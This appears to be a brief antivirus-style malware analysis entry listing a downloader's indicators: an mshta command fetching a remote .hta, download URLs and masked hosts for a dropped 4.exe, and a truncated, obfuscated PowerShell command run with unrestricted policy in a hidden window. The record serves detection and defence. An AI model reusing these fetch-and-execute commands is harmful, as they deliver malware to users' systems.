Technical Information
- '<SYSTEM32>\mshta.exe' http://gr#.#dns.net/prepaid.hta
- '%APPDATA%\4.exe'
- %APPDATA%\4.exe
- 'gr#.#dns.net':80
- '2.##.56.247':80
- http://gr#.#dns.net/prepaid.hta
- http://gr#.#dns.net/4.exe
- DNS ASK gr#.#dns.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function uDnDVKT($qOzxhIF, $JFqQaDW){[IO.File]::WriteAllBytes($qOzxhIF, $JFqQaDW)};function pNSyERWErIkPgQMA($qOzxhIF){if($qOzxhIF.EndsWith((PkjYelYveoOrSO @(44059...' (with hidden window)